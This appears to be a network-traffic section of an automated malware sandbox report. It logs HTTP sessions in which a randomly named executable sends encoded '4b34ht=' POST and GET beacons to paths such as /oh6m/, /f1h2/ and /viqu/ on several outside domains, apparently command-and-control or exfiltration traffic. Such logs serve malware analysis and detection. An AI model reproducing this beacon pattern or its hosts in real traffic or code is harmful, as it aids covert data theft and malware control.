                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:59.665319920 CEST | 563 | IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzcyNzI2MmEtNjc4NC00NTZiLTk0NDQtNTUwYmRmYzNiZWZlIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          34 | 192.168.2.5 | 49749 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:02.594897032 CEST | 773 | OUT | POST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=5jLNMXb2XtHOrDc2FZT0VBnPsi7mEMdWoLJk8ePu8KT9riMLqzERl84qm9m5Fnw4W6J5of7Xi/FFyQu1Zb0muPu4nsKOiotm7TC5mGsHdPS63ECKvtWdTPvLGNe5KctVaTlmPA2zZBulu3fKpHn3GJTmXoiF7WGNlzaDmhOE3DZwnHnUFc+JUtkNm+gV9+FJTJkAeg1mhhUyx+Mx/FiMA/l6UPfg
                                          May 27, 2024 12:45:03.059113979 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:02 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: 42bd7d32-af59-4faa-9710-0442a62a3ea5
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=42bd7d32-af59-4faa-9710-0442a62a3ea5; expires=Mon, 27 May 2024 11:00:03 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:03.059180975 CEST | 563 | IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDJiZDdkMzItYWY1OS00ZmFhLTk3MTAtMDQ0MmE2MmEzZWE1IiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          35 | 192.168.2.5 | 49750 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:05.129842043 CEST | 1790 | OUT | POST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht= [TRUNCATED]
                                          May 27, 2024 12:45:05.627615929 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:05 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: ada3a555-77c1-4edd-ab87-48a7cc578736
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=ada3a555-77c1-4edd-ab87-48a7cc578736; expires=Mon, 27 May 2024 11:00:05 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:05.627652884 CEST | 563 | IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWRhM2E1NTUtNzdjMS00ZWRkLWFiODctNDhhN2NjNTc4NzM2IiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          36 | 192.168.2.5 | 49751 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:07.664710999 CEST | 502 | OUT | GET /oh6m/?4b34ht=0hjtPibzKO3ZkT4WCImxDHrzyGnYBfhDxpd96Njw0Kz+uSoJqw8c1u4CpsfzEVAvZJgLgbHe9v9Z2CW7S5Mmgqq6m67vtrFp6Au24Wk/I93/9XnPpdf/S4Hde+etKMlcYw==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:08.132663012 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:45:07 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1506
                                          x-request-id: b2d32690-d7a5-4215-9d9a-e8f5593b61e1
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pbHeF8xd4CIJ1HM379Yuhz+CGSDxMnjq40GcQfB+Hi2CkPH3vxEYm9FvozTbKeK4drpTNZwVoD+zoZKsHOn0PA==
                                          set-cookie: parking_session=b2d32690-d7a5-4215-9d9a-e8f5593b61e1; expires=Mon, 27 May 2024 11:00:08 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_pbHeF8xd4CIJ1HM379Yuhz+CGSDxMnjq40GcQfB+Hi2CkPH3vxEYm9FvozTbKeK4drpTNZwVoD+zoZKsHOn0PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:45:08.132683039 CEST | 959 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYjJkMzI2OTAtZDdhNS00MjE1LTlkOWEtZThmNTU5M2I2MWUxIiwicGFnZV90aW1lIjoxNzE2ODA2Nz


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          37 | 192.168.2.5 | 49752 | 173.254.28.213 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:13.277862072 CEST | 774 | OUT | POST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.newmediamonday.com/f1h2/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=l0YUNVUuZHnQRak8YBA2dhQSYjkFN7G67Z2b/fD2DO3fBvAsYGYjTHA7fBdmcX1/MyDevICg0jNoN6ZGm5k1PKf8Vcnnydb140eUYQ7wMFHr2gP/gwJlzfcXlvw/h8Nd1gIE1I4ulHnlcGhQwf7Q+5XtorqDwKEQcDAGolG1IO9trOT9p55I2mB7ifkjURtcj39X+wU=
                                          May 27, 2024 12:45:13.943128109 CEST | 247 | IN | HTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:13 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          38 | 192.168.2.5 | 49753 | 173.254.28.213 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:15.812705040 CEST | 794 | OUT | POST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.newmediamonday.com/f1h2/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=l0YUNVUuZHnQR608UCY2KRQRGTkFHbHz7Z6b/eXmC8jfPtYsJ1AjSHA7LxdjYX10M1KhvKWg0jxoN4BGmOIyOaf+e8nl/9b140eUYUXWMFPr2Q//hSh6o/cUivw/rcNZ1gI21MZFlFflcDNQwO7T05XrmLrI3qMYFShH1HzIYe4UnY+XzbxglGtDyMsUFhM15UtngnAd0ikKBp8HWXBGWrncDmYi
                                          May 27, 2024 12:45:16.509840965 CEST | 247 | IN | HTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:16 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          39 | 192.168.2.5 | 49754 | 173.254.28.213 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:18.968502045 CEST | 1811 | OUT | POST /f1h2/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Origin: http://www.newmediamonday.com
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.newmediamonday.com/f1h2/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:19.702219009 CEST | 247 | IN | HTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:19 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          40 | 192.168.2.5 | 49755 | 173.254.28.213 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:21.505393982 CEST | 509 | OUT | GET /f1h2/?4b34ht=o2w0OkdzOU7AeO8cST1vLwAMb2MVSZPok4SxmOvOEN/vFfcFf0cZDVwWJD0TY2twL06giNetwFt+I5xckOsROdTXbf+WwKvZ5D3dZkP4IlWKwwnosj8+1uAXlawkkcomhg==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.newmediamonday.com
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:22.210407019 CEST | 247 | IN | HTTP/1.1 302 Moved Temporarily
                                          Date: Mon, 27 May 2024 10:45:22 GMT
                                          Server: Apache
                                          Upgrade: h2,h2c
                                          Connection: Upgrade, close
                                          Location: https://newmediamonday.com
                                          Vary: User-Agent
                                          Content-Length: 0
                                          Content-Type: text/html; charset=UTF-8


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          41 | 192.168.2.5 | 49756 | 65.181.132.158 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:27.941920996 CEST | 747 | OUT | POST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=BXqSW2sBCDZNfAe4AepUGjS2363uH1bMVaBUMr7V1K4Kj5y2tEHrcpSBE5SujBhXQ7amb6jTd2AfgxLfeMSChBKsJxb0fbFBkd9Rowb2z8rMQm2KPqKV9hzz91Q/Y6AHxI4p2AbjW/pJ5T5HOPIueDYVf0qesa1MysDSKECJUbflo5JluX/JSl2O3xmNLMtvZR/TLC0=
                                          May 27, 2024 12:45:28.924792051 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:28 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=2ed20434-551f-45986f4e8b2b2869bc5a37bc02223270e849; Expires=1716813928; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067287074877e0a700e6c335d6b37804cf406a8e51cba0c11;path=/;HttpOnly;Max-Age=1800
                                          jckl: U+BhHKgc/ZIXDmkfo/9koLxHCYPpU7cOzO1AIp3rpTe6YfQTY7/l+bSOPW049nEyzqB5UZAWlsF13rebgrmmwg==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: 52b2e0d15b365fdd8152ece0fcf2eda9
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          42 | 192.168.2.5 | 49757 | 65.181.132.158 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:30.478554964 CEST | 767 | OUT | POST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=BXqSW2sBCDZNfhu4F9RUKTS57a3uOVbIVa9UMuDF24MKjYC2sG/rRJSBLZShnBhcQ7WEb/LTd2Ufg1Dfe9SFgRKqCRb2bbFBkd9Rozncz6DMTWmKOIiS0Bz83VQ/c6ADxI4f2FC2W9RJ5X1Hf7chVDYXRUr6sa5A8/75WHn+JtTmgvkP013hBFa2niu6a8MGDyvjVViQzAKYg5ENYni6kczRAsmj
                                          May 27, 2024 12:45:32.142249107 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:32.142525911 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}
                                          May 27, 2024 12:45:32.143455029 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:31 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=fcb884f2-659c-473ac81e0635185a603f22e5ebda4194506a; Expires=1716813931; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067312296406e4c1eea5414b2beceb34febd2fb2ed6f21be1;path=/;HttpOnly;Max-Age=1800
                                          jckl: Hxy1BEi3JI8z+D5sWbMFHAk3Z4LzZA1gCjCO3E6tybxhtybMODT1Cxc6u1QCWa4cadB+OxI3a7ajJnoiQ+m6Ww==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          X-Request-Id: b3621232484904f2e328d21ac68eac2f
                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 20 22 36 30 30 31 22 2c 22 6d 73 67 22 3a 20 22 66 61 69 6c 22 2c 22 72 65 73 75 6c 74 22 3a 22 e8 8e b7 e5 8f 96 e4 bf a1 e6 81 af e5 a4 b1 e8 b4 a5 22 7d
                                          Data Ascii: {"status": "6001","msg": "fail","result":""}


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          43 | 192.168.2.5 | 49758 | 65.181.132.158 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:45:33.016129971 CEST | 1784 | OUT | POST /viqu/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.jl884.vip
                                          Origin: http://www.jl884.vip
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.jl884.vip/viqu/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:45:35.064579010 CEST | 778 | IN | HTTP/1.1 200 OK
                                          Date: Mon, 27 May 2024 10:45:34 GMT
                                          Content-Type: application/json;charset=utf8;
                                          Content-Length: 62
                                          Connection: close
                                          Set-Cookie: http_waf_cookie=bcbe3615-9638-4f2073ab54bf092b4c9640a9033580cdd6b3; Expires=1716813933; Path=/; HttpOnly
                                          Set-Cookie: acw_tc=ac11000117168067345403663e11ca6cd7bbc4f64e8583e0e61441c4defe63;path=/;HttpOnly;Max-Age=1800
                                          jckl: QliM1ONpibm7gGLxB3FwJjMauN9Vjgke/D+Ap4DM8X5aIsApOJ26c6xXv3ksnnFATCOfXe72BIMCEAhmADgwAQ==
                                          X-Content-Type-Options: nosniff
                                          X-XSS-Protection: 1
                                          Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
                                          Via: 1.1 google
